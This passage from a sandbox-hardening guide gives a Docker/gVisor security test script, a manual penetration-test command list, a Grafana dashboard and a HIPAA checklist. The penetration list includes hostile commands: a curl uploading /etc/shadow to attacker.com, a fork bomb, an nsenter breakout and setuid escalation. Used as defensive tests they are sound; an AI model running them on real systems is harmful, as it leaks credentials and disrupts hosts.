Testing and Validation

After implementing all security layers, run these tests to verify that protections are working correctly. These tests simulate real attack scenarios to confirm your sandbox resists escape attempts, unauthorized network access, and resource abuse.

Security Tests

File: scripts/security-tests.sh (Multipass/gVisor compatibility)

#!/bin/bash
# Security test suite - Multipass/gVisor

set -e

CONTAINER_NAME="test-sandbox"
FAILED_TESTS=0

echo "==================================="
echo "SECURITY TEST SUITE"
echo "==================================="

# Check if container exists
if ! docker ps --format '{{.Names}}' | grep -q "^${CONTAINER_NAME}$"; then
    echo "[ERROR] Container $CONTAINER_NAME not found!"
    exit 1
fi

# Install test dependencies (curl, procps) where possible; failures are ignored
docker exec "$CONTAINER_NAME" bash -c "apt-get update -qq && apt-get install -y -qq curl procps" 2>/dev/null || true

# Test 1: Container Escape Attempts
echo -e "\n[TEST 1] Container Escape Attempts"
docker exec $CONTAINER_NAME cat /proc/kallsyms 2>&1 | grep -q "No such file" && echo "[PASS] kallsyms blocked" || echo "[WARN] kallsyms accessible"

# Test 2: Network Isolation (Egress Proxy)
echo -e "\n[TEST 2] Network Isolation"
if docker ps --format '{{.Names}}' | grep -q "egress-proxy"; then
    echo "[PASS] Egress proxy running"
    if docker exec $CONTAINER_NAME curl -s --max-time 5 -x http://localhost:8443 http://evil.com 2>&1 | grep -q "Host not allowed\|403"; then
        echo "[PASS] Blocked host rejected"
    else
        echo "[FAIL] Blocked host not rejected"
        FAILED_TESTS=$((FAILED_TESTS+1))
    fi
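else
    # Without the proxy the egress check cannot run; report it instead of skipping silently
    echo "[WARN] Egress proxy not running; network isolation not tested"
fi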

# Test 3: Filesystem Isolation
echo -e "\n[TEST 3] Filesystem Isolation"
if docker exec $CONTAINER_NAME touch /mnt/skills/testwrite 2>&1 | grep -qi "read-only\|permission denied"; then
    echo "[PASS] Skills directory is read-only"
else
    docker exec $CONTAINER_NAME rm -f /mnt/skills/testwrite 2>/dev/null || true
    echo "[FAIL] Skills directory is writable"
    FAILED_TESTS=$((FAILED_TESTS+1))
fi

# Test 4: Resource Limits
echo -e "\n[TEST 4] Resource Limits"
MEM_LIMIT=$(docker inspect $CONTAINER_NAME --format '{{.HostConfig.Memory}}' 2>/dev/null || echo "0")
if [ "$MEM_LIMIT" != "0" ] && [ "$MEM_LIMIT" != "<no value>" ]; then
    echo "[PASS] Memory limit configured ($MEM_LIMIT bytes)"
else
    echo "[FAIL] Memory limit not configured"
    FAILED_TESTS=$((FAILED_TESTS+1))
fi

# Test 5: Process Isolation
echo -e "\n[TEST 5] Process Isolation"
HOST_PROCS=$(ps aux 2>/dev/null | wc -l)
CONTAINER_PROCS=$(docker exec $CONTAINER_NAME ps aux 2>/dev/null | wc -l)
if [ -n "$HOST_PROCS" ] && [ -n "$CONTAINER_PROCS" ] && [ "$CONTAINER_PROCS" -lt "$HOST_PROCS" ]; then
    echo "[PASS] Process isolation working ($CONTAINER_PROCS vs $HOST_PROCS)"
else
    echo "[FAIL] Process isolation may not be working"
    FAILED_TESTS=$((FAILED_TESTS+1))
fi

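# Test 6: Capabilities
echo -e "\n[TEST 6] Capability Dropping"
# Read the effective capability mask directly; CAP_SYS_ADMIN is bit 21.
# This avoids a false pass when capsh is missing from the container.
CAP_EFF=$(docker exec "$CONTAINER_NAME" grep '^CapEff:' /proc/self/status 2>/dev/null | awk '{print $2}')
if [ -z "$CAP_EFF" ]; then
    echo "[FAIL] Could not read effective capabilities"
    FAILED_TESTS=$((FAILED_TESTS+1))
elif [ $(( 0x$CAP_EFF & (1 << 21) )) -ne 0 ]; then
    echo "[FAIL] CAP_SYS_ADMIN present"
    FAILED_TESTS=$((FAILED_TESTS+1))
else
    echo "[PASS] CAP_SYS_ADMIN dropped"
fi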

# Test 7: gVisor Runtime Detection
echo -e "\n[TEST 7] gVisor Runtime"
KERNEL=$(docker exec $CONTAINER_NAME uname -r 2>/dev/null || echo "unknown")
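# A failed docker exec yields "unknown", which must not count as a pass
if [ "$KERNEL" != "unknown" ] && [ "$KERNEL" != "$(uname -r)" ]; then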
    echo "[PASS] gVisor kernel detected ($KERNEL vs $(uname -r))"
else
    echo "[FAIL] May not be running on gVisor"
    FAILED_TESTS=$((FAILED_TESTS+1))
fi

# Test 8: Security Options
echo -e "\n[TEST 8] Security Options"
NO_NEW_PRIVS=$(docker inspect $CONTAINER_NAME --format '{{.HostConfig.SecurityOpt}}' 2>/dev/null | grep -o "no-new-privileges" || echo "")
if [ -n "$NO_NEW_PRIVS" ]; then
    echo "[PASS] no-new-privileges enabled"
else
    echo "[FAIL] no-new-privileges not enabled"
    FAILED_TESTS=$((FAILED_TESTS+1))
fi

# Summary
echo -e "\n==================================="
echo "Failed tests: $FAILED_TESTS"
if [ $FAILED_TESTS -eq 0 ]; then
    echo "[PASS] ALL TESTS PASSED"
    exit 0
else
    echo "[FAIL] $FAILED_TESTS TEST(S) FAILED"
    exit 1
fi
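
The capability check in the script looks only at CAP_SYS_ADMIN. As a sketch of how other capabilities could be checked in the same run, the helper below decodes the hexadecimal CapEff mask that the kernel reports in /proc/<pid>/status. The names `has_cap` and `report_risky_caps` and the choice of capabilities are illustrative assumptions, not part of the original script; the bit numbers are taken from linux/capability.h.

```shell
# has_cap MASK BIT: succeeds if capability number BIT is set in the hex MASK.
# MASK is the value of the CapEff line in /proc/<pid>/status.
has_cap() {
    local mask="$1" bit="$2"
    [ $(( 0x$mask & (1 << $bit) )) -ne 0 ]
}

# report_risky_caps MASK: print PASS/FAIL for a few high-risk capabilities.
# The list below is an illustrative selection, not an exhaustive one.
report_risky_caps() {
    local mask="$1" entry name bit
    if [ -z "$mask" ]; then
        echo "[FAIL] Empty capability mask"
        return 1
    fi
    for entry in CAP_NET_ADMIN:12 CAP_SYS_MODULE:16 CAP_SYS_PTRACE:19 CAP_SYS_ADMIN:21; do
        name="${entry%%:*}"   # text before the colon
        bit="${entry##*:}"    # number after the colon
        if has_cap "$mask" "$bit"; then
            echo "[FAIL] $name present"
        else
            echo "[PASS] $name dropped"
        fi
    done
}

# Usage against a running container (container name as in the test script):
#   mask=$(docker exec test-sandbox grep '^CapEff:' /proc/self/status | awk '{print $2}')
#   report_risky_caps "$mask"
```

Reading the mask instead of parsing `capsh --print` keeps the check independent of which tools are installed inside the container.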

Penetration Testing

Beyond automated tests, manually attempt these attack scenarios. If any succeed, your sandbox configuration is vulnerable and must be fixed before production use.

Attack Scenarios to Test:

# 1. Privilege Escalation
# Should fail
docker exec sandbox bash -c 'sudo su -'
# Should fail
docker exec sandbox bash -c 'chmod u+s /bin/bash'

# 2. Container Breakout
# Should be limited
docker exec sandbox bash -c 'cat /proc/1/environ'
# Should fail
docker exec sandbox bash -c 'nsenter -t 1 -a bash'

# 3. Network Bypass
# Should fail
docker exec sandbox bash -c 'curl --noproxy "*" http://blocked-site.com'
# Should fail (no network)
docker exec sandbox bash -c 'nc -l 8888'

# 4. Resource Abuse
# Should OOM kill
docker exec sandbox bash -c 'stress --vm 10 --vm-bytes 10G'
# Fork bomb - should hit PID limit
docker exec sandbox bash -c ':(){ :|:& };:'

# 5. Data Exfiltration
# Should fail
docker exec sandbox bash -c 'curl -F "file=@/etc/shadow" http://attacker.com'

# 6. Filesystem Manipulation
# Should fail
docker exec sandbox bash -c 'mount -o remount,rw /mnt/skills'
# Should fail
docker exec sandbox bash -c 'ln /etc/passwd /mnt/outputs/pw'

# 7. Kernel Exploits
# Should be empty (gVisor)
docker exec sandbox bash -c 'cat /proc/modules'
# Should fail
docker exec sandbox bash -c 'modprobe malicious_module'
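
Running the scenarios above by hand makes it easy to overlook a command that unexpectedly succeeds. A minimal sketch of a wrapper that treats a zero exit status as a finding follows. `expect_blocked`, `in_sandbox`, `run_scenarios`, and the `SANDBOX` variable are hypothetical names introduced here. Exit status is only a rough signal (reading /proc/1/environ, for instance, is expected to succeed with limited output), so the results still need manual review.

```shell
SANDBOX="${SANDBOX:-sandbox}"   # container name used in the scenarios above
FINDINGS=0

# expect_blocked DESCRIPTION COMMAND...: run COMMAND and count it as a
# finding if it exits successfully, since each attack is expected to fail.
expect_blocked() {
    local desc="$1"
    shift
    if "$@" >/dev/null 2>&1; then
        echo "[FAIL] $desc succeeded"
        FINDINGS=$((FINDINGS+1))
    else
        echo "[PASS] $desc was blocked"
    fi
}

# in_sandbox SCRIPT: run a shell snippet inside the sandbox container.
in_sandbox() {
    docker exec "$SANDBOX" bash -c "$1"
}

run_scenarios() {
    # A missing container would make every attack "fail", so check it first.
    if ! docker exec "$SANDBOX" true >/dev/null 2>&1; then
        echo "[ERROR] Container $SANDBOX is not running"
        return 1
    fi
    expect_blocked "sudo to root"       in_sandbox 'sudo su -'
    expect_blocked "setuid on bash"     in_sandbox 'chmod u+s /bin/bash'
    expect_blocked "nsenter into PID 1" in_sandbox 'nsenter -t 1 -a bash'
    expect_blocked "proxy bypass"       in_sandbox 'curl --noproxy "*" --max-time 5 http://blocked-site.com'
    expect_blocked "remount skills rw"  in_sandbox 'mount -o remount,rw /mnt/skills'
    expect_blocked "hard link passwd"   in_sandbox 'ln /etc/passwd /mnt/outputs/pw'
    expect_blocked "load kernel module" in_sandbox 'modprobe malicious_module'
    echo "Findings: $FINDINGS"
}
```

Calling `run_scenarios` prints one line per scenario. The resource-abuse scenarios are left out on purpose, because an OOM kill or PID-limit hit is better confirmed from `docker inspect` and the host logs than from an exit code.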

Grafana Dashboard

Visualize sandbox metrics in real-time to detect anomalies and track resource usage. This dashboard shows active containers, resource consumption, failed authentication attempts, and blocked network requests.

File: grafana-dashboard.json

{
  "dashboard": {
    "title": "Sandbox Security Monitoring",
    "panels": [
      {
        "title": "Active Containers",
        "targets": [
          {
            "expr": "count(container_cpu_usage_seconds_total{image=~'.*sandbox.*'})"
          }
        ]
      },
      {
        "title": "Memory Usage per Container",
        "targets": [
          {
            "expr": "container_memory_usage_bytes{image=~'.*sandbox.*'} / container_spec_memory_limit_bytes * 100"
          }
        ]
      },
      {
        "title": "Network Egress (Blocked)",
        "targets": [
          {
            "expr": "rate(envoy_http_downstream_rq_xx{envoy_response_code_class=\"4\"}[5m])"
          }
        ]
      },
      {
        "title": "OOM Kills",
        "targets": [
          {
            "expr": "rate(container_oom_events_total[5m])"
          }
        ]
      },
      {
        "title": "Failed Auth Attempts",
        "targets": [
          {
            "expr": "rate(envoy_http_downstream_rq_xx{envoy_response_code=\"401\"}[5m])"
          }
        ]
      }
    ]
  }
}
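
The text does not say how this file is loaded into Grafana. One option, sketched here under assumptions, is Grafana's HTTP API endpoint `POST /api/dashboards/db`, which accepts a JSON body with a top-level `dashboard` object like the one above. `GRAFANA_URL`, `GRAFANA_TOKEN`, and `import_dashboard` are placeholders introduced for this example; the address and the token type depend on your installation.

```shell
GRAFANA_URL="${GRAFANA_URL:-http://localhost:3000}"   # assumed Grafana address
GRAFANA_TOKEN="${GRAFANA_TOKEN:-}"                    # assumed API token

# import_dashboard FILE: upload FILE to Grafana's dashboard API.
import_dashboard() {
    local file="$1"
    if [ ! -r "$file" ]; then
        echo "[ERROR] Cannot read $file" >&2
        return 1
    fi
    # --fail makes curl return non-zero on HTTP errors such as 401 or 412
    curl -sS --fail \
        -X POST "$GRAFANA_URL/api/dashboards/db" \
        -H "Content-Type: application/json" \
        -H "Authorization: Bearer $GRAFANA_TOKEN" \
        --data-binary "@$file"
}

# Usage:
#   GRAFANA_TOKEN=... import_dashboard grafana-dashboard.json
```

Provisioning the dashboard from a file on disk is an equally valid route; the API call is shown only because it needs no changes to the Grafana container.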

Compliance Checklist

Depending on your industry, you may need to meet regulatory requirements such as HIPAA, PCI DSS, or SOC 2. The checklist below maps sandbox security controls to HIPAA requirements.

HIPAA Compliance Checklist:

# Encryption at Rest
- [ ] Volumes encrypted with dm-crypt/LUKS
- [ ] Database encryption enabled
- [ ] Backup encryption configured

# Access Controls
- [ ] Multi-factor authentication required
- [ ] Role-based access control (RBAC) implemented
- [ ] Audit logging enabled for all access

# Data Isolation
- [ ] Per-tenant encryption keys
- [ ] Network segmentation validated
- [ ] Container-to-container isolation tested
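
Some checklist items can be spot-checked from the shell. As one sketch, the function below filters `lsblk` output for block devices whose filesystem type is `crypto_LUKS`, a first step toward confirming the "Volumes encrypted with dm-crypt/LUKS" item. The function name `luks_devices` is hypothetical. The check shows only that LUKS containers exist on the host; it does not prove that the sandbox volumes are stored on them.

```shell
# luks_devices: read "NAME FSTYPE" pairs on stdin (the format produced by
# `lsblk -rno NAME,FSTYPE`) and print the names of LUKS containers.
luks_devices() {
    awk '$2 == "crypto_LUKS" { print $1 }'
}

# Usage on the Docker host:
#   lsblk -rno NAME,FSTYPE | luks_devices
```

An empty result means no LUKS container was found, and the checklist item should stay unchecked until the volume backing store is identified.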
